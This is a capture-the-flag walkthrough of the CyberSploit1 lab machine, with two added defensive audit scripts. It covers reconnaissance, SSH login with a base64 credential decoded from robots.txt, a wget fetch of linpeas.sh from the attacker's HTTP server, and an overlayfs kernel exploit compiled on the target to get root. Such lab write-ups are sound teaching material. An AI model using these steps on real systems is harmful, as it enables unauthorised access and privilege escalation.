# CyberSploit1

## nmap

```
(base) [psdon@arch CyberSploit1]$ mkdir nmap
(base) [psdon@arch CyberSploit1]$ sudo rustscan -a 192.168.217.92 --ulimit 5000 -t 2000 -- -T4 -A -oA nmap/all-ports-service-scan                                                                                    
[~] The config file is expected to be at "/root/.rustscan.toml"                                                                                                                                                      
[~] Automatically increasing ulimit value to 5000.                                                                                                                                                                   
Open 192.168.217.92:22                                                                                                                                                                                               
Open 192.168.217.92:80 
```

The scan shows that a web server is open on port 80.

<div align="left"><img src="https://3211174753-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MhuCb52HTt9nZusE7xn%2F-Mi3FsC-lUqoaBq8ivqx%2F-Mi3GRG8BBcHojG2T6c2%2Fimage.png?alt=media&#x26;token=807fcec3-1648-4e82-bcc1-27db1b935150" alt=""></div>

Let's check the source code of the page, where we can find a possible username.

<div align="left"><img src="https://3211174753-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MhuCb52HTt9nZusE7xn%2F-Mi3FsC-lUqoaBq8ivqx%2F-Mi3Gb4MCU_flzKqZrK1%2Fimage.png?alt=media&#x26;token=716b57eb-cce8-4f19-a410-6af8d7327b13" alt=""></div>

Let's also check `robots.txt`. As you can see, it contains a base64-encoded string.

<div align="left"><img src="https://3211174753-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MhuCb52HTt9nZusE7xn%2F-Mi3FsC-lUqoaBq8ivqx%2F-Mi3H3HutbbmcnbX3wKO%2Fimage.png?alt=media&#x26;token=1d3b940c-3a10-4e28-9167-5a90940b815f" alt=""></div>

We can decode it by executing the following command:

```
(base) [psdon@arch CyberSploit1]$ echo Y3liZXJzcGxvaXR7eW91dHViZS5jb20vYy9jeWJlcnNwbG9pdH0= | base64 --decode                                                                                                        
cybersploit{youtube.com/c/cybersploit}
```
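A defender-side counterpart to the manual decode above, as an added example that is not part of the original write-up: a shell function that scans web-root files such as `robots.txt` for base64 runs that decode to readable text, so encoded secrets are caught before they are published. The function name, the `MIN_LEN` threshold and the sample `robots.txt` contents are assumptions; only the encoded string itself comes from this page.

```shell
#!/bin/sh
# Added example: flag base64-looking tokens in web content that decode to
# printable text. MIN_LEN is an assumed threshold to skip short words.
MIN_LEN=16

# Usage: scan_encoded_strings FILE...
# Prints "file: token -> decoded" for every token that is valid base64
# and decodes to printable ASCII only.
scan_encoded_strings() {
    for f in "$@"; do
        grep -oE '[A-Za-z0-9+/]{'"$MIN_LEN"',}={0,2}' "$f" 2>/dev/null | sort -u |
        while IFS= read -r tok; do
            # Padded base64 always has a length that is a multiple of 4.
            [ $(( ${#tok} % 4 )) -eq 0 ] || continue
            # Count decoded bytes outside the printable range (space to ~).
            nonprint=$(printf '%s' "$tok" | base64 --decode 2>/dev/null |
                       LC_ALL=C tr -d ' -~' | wc -c)
            [ "$nonprint" -eq 0 ] || continue
            decoded=$(printf '%s' "$tok" | base64 --decode 2>/dev/null)
            [ -n "$decoded" ] || continue
            printf '%s: %s -> %s\n' "$f" "$tok" "$decoded"
        done
    done
}

# Constructed sample: a robots.txt that carries the encoded string shown above.
sample_dir=$(mktemp -d)
printf 'User-agent: *\nDisallow: /admin/\n%s\n' \
    'Y3liZXJzcGxvaXR7eW91dHViZS5jb20vYy9jeWJlcnNwbG9pdH0=' > "$sample_dir/robots.txt"
scan_encoded_strings "$sample_dir/robots.txt"
```

Run it over the whole document root in a deployment pipeline; any hit means a value that looks hidden is readable by every visitor.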

## Exploitation

Let's try to log in over SSH with the username `itsskv`, using the decoded string as the password:

```
(base) [psdon@arch nikto]$ ssh itsskv@192.168.217.92                                                      
This key is not known by any other names                                                                  
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes                                  
Warning: Permanently added '192.168.217.92' (ECDSA) to the list of known hosts.                           
itsskv@192.168.217.92's password: cybersploit{youtube.com/c/cybersploit}                                                                          
itsskv@cybersploit-CTF:~$   
```

Looks like we have successfully gained an initial shell. Sweet :D

## Post Exploitation

First, let's transfer `linpeas.sh` from our machine to the target machine. We start by serving it over HTTP from the linPEAS directory:

```
(base) [psdon@arch CyberSploit1]$ cd /opt/peass/linPEAS/                                                  
(base) [psdon@arch linPEAS]$ ls                                                                           
builder  images  linpeas.sh  README.md                                                                    
(base) [psdon@arch linPEAS]$ sudo python -m http.server 80                                                
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 
```

You can find the IP address of our machine's `tun` interface by executing the following:

```
(base) [psdon@arch CyberSploit1]$ ip a | grep tun                                                         
5: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
    inet 192.168.49.217/24 scope global tun0                                                              
(base) [psdon@arch CyberSploit1]$
```

Then download the script on the target using `wget` and make it executable:

```
itsskv@cybersploit-CTF:~$ wget http://192.168.49.217/linpeas.sh                                                                                                                                                      
--2021-08-27 02:16:13--  http://192.168.49.217/linpeas.sh                                                                                                                                                            
Connecting to 192.168.49.217:80... connected.                                                                                                                                                                        
HTTP request sent, awaiting response... 200 OK                                                                                                                                                                       
Length: 458110 (447K) [application/x-sh]                                                                                                                                                                             
Saving to: `linpeas.sh'                                                                                                                                                                                              
                                                                                                                                                                                                                     
100%[================================================================>] 4,58,110     147K/s   in 3.0s                                                                                                                
                                                                                                                                                                                                                     
2021-08-27 02:16:17 (147 KB/s) - `linpeas.sh' saved [458110/458110]                                                                                                                                                  
                                                                                                                                                                                                                                                                                                                                                                                   
itsskv@cybersploit-CTF:~$ chmod +x linpeas.sh 
```

And now we can run `linpeas.sh`:

```
itsskv@cybersploit-CTF:~$ ./linpeas.sh                                                                                                                                                                               
                                                                                                                                                                                                                     
                                                                                                                                                                                                                     
        linpeas-ng by carlospolop
```

Right off the bat, you can see the version of the Linux kernel it is running.

<div align="left"><img src="https://3211174753-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MhuCb52HTt9nZusE7xn%2F-Mi3FsC-lUqoaBq8ivqx%2F-Mi3MPM0t9x5zBOh4KKj%2Fimage.png?alt=media&#x26;token=793f884e-aa19-4577-84c0-441840a38767" alt=""></div>

We can check this Linux kernel version with `searchsploit`, and I found that it is vulnerable to the **overlayfs** exploit.

<div align="left"><img src="https://3211174753-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MhuCb52HTt9nZusE7xn%2F-Mi3FsC-lUqoaBq8ivqx%2F-Mi3N0lt7VucqxfdbG-1%2Fimage.png?alt=media&#x26;token=1c03b51d-dbb9-4877-925f-192cf3b0c1c5" alt=""></div>

## Privilege Escalation

Let's mirror the exploit to our current working directory and copy the content of the file to the clipboard:

<div align="left"><img src="https://3211174753-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MhuCb52HTt9nZusE7xn%2F-Mi3FsC-lUqoaBq8ivqx%2F-Mi3Nl-TVx3p9Slz2kHa%2Fimage.png?alt=media&#x26;token=600d3fee-b7f9-40b1-8425-3d8acfc25bea" alt=""></div>

```
xclip -selection clipboard -i < 37292.c
```

And paste it into a new file on the target machine:

```
nano e.c
```

<div align="left"><img src="https://3211174753-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MhuCb52HTt9nZusE7xn%2F-Mi3FsC-lUqoaBq8ivqx%2F-Mi3OVdg3peGpuw_Ch2D%2Fimage.png?alt=media&#x26;token=d0c1d527-a8aa-4af3-a727-be990de49561" alt=""></div>

We can compile the C source code using the `gcc` binary installed on the target machine. Right after running the exploit, we get root on the target machine.

<div align="left"><img src="https://3211174753-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MhuCb52HTt9nZusE7xn%2F-Mi3FsC-lUqoaBq8ivqx%2F-Mi3OnbN9Rvq5c8FDJva%2Fimage.png?alt=media&#x26;token=3a36bc1e-1faa-4380-ac4c-e08f58a9c959" alt=""></div>
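From the defender's side, the escalation above relied on two host conditions: a kernel older than the vendor's fixed release, and a compiler that a low-privileged account could run. The following is an added hardening check, not part of the original write-up. The function names, the `BUILD_TOOLS` list and the `FIXED_RELEASE` variable are assumptions, and the fixed release must be taken from your distribution's advisory because this page does not state it.

```shell
#!/bin/sh
# Added example: audit the two host conditions the escalation relied on.
# All names here are assumptions, not taken from the write-up.

# Assumed list of build tools to look for.
BUILD_TOOLS="gcc cc g++ clang tcc make"

# Succeeds (exit 0) when kernel release $1 sorts strictly before release $2.
# $2 is the first fixed release from the distribution's advisory.
kernel_older_than() {
    [ "$1" != "$2" ] &&
    [ "$(printf '%s\n%s\n' "$1" "$2" | sort -V | head -n 1)" = "$1" ]
}

# Print every build tool in the given directories that "other" users may
# execute. -L resolves symlinks such as cc -> gcc; -perm -001 tests o+x.
world_executable_build_tools() {
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        for name in $BUILD_TOOLS; do
            find -L "$dir" -maxdepth 1 -name "$name" -type f -perm -001 2>/dev/null
        done
    done | sort
}

# Report for the local host. FIXED_RELEASE is a placeholder: export it with
# the value from the advisory before running (the default of 0 flags nothing).
audit_host() {
    fixed_release=${FIXED_RELEASE:-0}
    if kernel_older_than "$(uname -r)" "$fixed_release"; then
        echo "kernel $(uname -r) predates fixed release $fixed_release"
    fi
    world_executable_build_tools /usr/bin /usr/local/bin /bin |
        sed 's/^/build tool executable by any user: /'
}

audit_host
```

On servers that do not need to build software, removing the toolchain or restricting it to an administrative group (mode 750) closes the second condition; patching the kernel closes the first.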

Thanks, and enjoy! :D
